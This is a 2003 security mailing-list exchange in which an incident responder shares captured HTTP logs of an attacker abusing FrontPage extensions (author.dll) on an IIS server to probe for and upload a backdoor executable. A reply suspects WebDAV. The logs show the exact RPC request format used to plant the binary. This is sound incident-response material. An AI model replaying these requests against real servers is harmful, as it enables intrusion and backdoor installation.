Re: frontpage extensions; backdoor or initial compromise?

From: Eric Kimminau (root_at_kimminau.org)
Date: 07/03/03

  • Next message: Jordan Wiens: "RE: frontpage extensions; backdoor or initial compromise?"
    Date: Thu, 3 Jul 2003 14:05:18 -0400 (EDT)
    To: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    
    

    Im assuming it was WebDAV, right? Get your Windows boxes patched and
    keep close tabs on them on Sunday.

    Eric.

    On Wed, 2 Jul 2003, Jordan Wiens wrote:

    > Date: Wed, 2 Jul 2003 13:08:43 -0400 (EDT)
    > From: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    > To: incidents@securityfocus.com
    > Subject: frontpage extensions; backdoor or initial compromise?
    >
    > We had a recent compromise that our IDS did not detect, however, it did
    > detect subsequent backdoor activity and a few other packets afterwards
    > that alerted us to the compromise. Upon closer investigation of the
    > activity, some of the additional information logged showed some frontpage
    > extensions being used in an interesting way. Anyone else seen this?
    >
    > Since we were unable to determine the initial compromise method, I'm
    > trying to figure out if this was purely used as a backdoor, or might also
    > have been the same method as the initial compromise.
    >
    > Some additional background info; the svchost.exe is a renamed servu ftp
    > daemon process that was loaded into the server along with a few other,
    > 'normal' backdoor tools.
    >
    > --
    > Jordan Wiens
    > UF Network Incident Response Team
    > (352)392-2061
    >
    > ATTACK:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:10 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 112
    > Content-Type: application/x-www-form-urlencoded
    > X-Vermeer-Content-Type: application/x-www-form-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    > method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true
    >
    >
    > SERVER RESPONSE:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    >
    > HTTP/1.1 200 OK
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    > Connection: close
    > Content-type: application/x-vermeer-rpc
    > X-FrontPage-User-Name: IUSR_MACHINE
    >
    > <html><head><title>vermeer RPC packet</title></head>
    > <body>
    > <p>method=getDocsMetaInfo:4.0.2.4715
    > <p>document_list=
    > <ul>
    > </ul>
    > <p>failedUrls=
    > <ul>
    > <li>svchost.exe
    > </ul>
    > </body>
    > </html>
    >
    >
    >
    > Additional session....
    >
    > ATTACKER:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:29 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 2142969
    > Content-Type: application/x-vermeer-urlencoded
    > X-Vermeer-Content-Type: application/x-vermeer-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    >
    > SERVER:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:21 GMT
    >
    > ATTACKER:
    > ---------------
    > method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo%
    > 3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fch
    > ecked%5fout=false
    > MZP@!L!This program must be run under Win32
    > $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata
    > .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS
    > htM=[s
    > .
    > . Additional raw data.
    > .
    >
    > ----------------------------------------------------------------------------
    > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > world's premier technical IT security event! 10 tracks, 15 training sessions,
    > 1,800 delegates from 30 nations including all of the top experts, from CSO's to
    > "underground" security specialists. See for yourself what the buzz is about!
    > Early-bird registration ends July 3. This event will sell out. www.blackhat.com
    > ----------------------------------------------------------------------------
    >
    >

    ----------------------------------------------------------------------------
    Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    world's premier technical IT security event! 10 tracks, 15 training sessions,
    1,800 delegates from 30 nations including all of the top experts, from CSO's to
    "underground" security specialists. See for yourself what the buzz is about!
    Early-bird registration ends July 3. This event will sell out. www.blackhat.com
    ----------------------------------------------------------------------------


  • Next message: Jordan Wiens: "RE: frontpage extensions; backdoor or initial compromise?"